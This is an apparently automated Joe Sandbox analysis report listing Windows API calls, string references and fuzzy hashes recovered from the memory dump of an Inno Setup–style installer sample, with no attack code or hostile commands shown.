                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Append$System
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1489644407-0
                                                                                                                                        • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                                        • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                                                        • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                                        • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
• TranslateMessage.USER32(?), ref: 0042448F
• DispatchMessageA.USER32(?), ref: 00424499
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
• Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
• Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
• Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
APIs
• SetPropA.USER32(00000000,00000000), ref: 0041666A
• SetPropA.USER32(00000000,00000000), ref: 0041667F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
• Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
• Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
• Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
• Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID: uu
• API String ID: 2087232378-2249551878
• Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
• Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
• Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
• Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
APIs
• IsWindowVisible.USER32(?), ref: 0041EE64
• IsWindowEnabled.USER32(?), ref: 0041EE6E
• EnableWindow.USER32(?,00000000), ref: 0041EE94
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Window$EnableEnabledVisible
• String ID:
• API String ID: 3234591441-0
• Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
• Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
• Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
• Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
APIs
• SetActiveWindow.USER32(?), ref: 0046A02D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ActiveWindow
• String ID: PrepareToInstall
• API String ID: 2558294473-1101760603
• Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
• Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
• Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
• Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID:
• String ID: /:*?"<>|
• API String ID: 0-4078764451
• Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
• Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
• Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
• Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
APIs
• SetActiveWindow.USER32(?), ref: 00482676
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ActiveWindow
• String ID: InitializeWizard
• API String ID: 2558294473-2356795471
• Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
• Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
• Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
• Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
• Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                                                                        APIs
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                                        Strings
                                                                                                                                        • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value
                                                                                                                                        • String ID: Inno Setup: Setup Version
                                                                                                                                        • API String ID: 3702945584-4166306022
                                                                                                                                        • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                                        • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                                                                        • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                                        • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                                                                        APIs
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value
                                                                                                                                        • String ID: NoModify
                                                                                                                                        • API String ID: 3702945584-1699962838
                                                                                                                                        • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                                        • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                                                                        • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                                        • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                                                                        APIs
                                                                                                                                        • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                                                          • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                                                          • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                                                          • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                                                        • SendNotifyMessageA.USER32(00010438,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2649214853-0
                                                                                                                                        • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                                        • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                                                                        • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                                        • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                                                          • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMetricsMultiSystemWide
                                                                                                                                        • String ID: /G
                                                                                                                                        • API String ID: 224039744-2088674125
                                                                                                                                        • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                                        • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                                                                        • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                                        • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                                                        • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2818636725-0
                                                                                                                                        • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                        • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                                                        • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                        • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2919029540-0
                                                                                                                                        • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                        • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                                                        • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                        • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                                                                        APIs
                                                                                                                                        • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                                                        • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindFree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4097029671-0
                                                                                                                                        • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                        • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                                                        • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                        • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                        • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CurrentEnumWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2396873506-0
                                                                                                                                        • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                                        • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                                                                        • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                                        • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                                                                        APIs
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastMove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 55378915-0
                                                                                                                                        • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                                        • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                                                        • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                                        • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
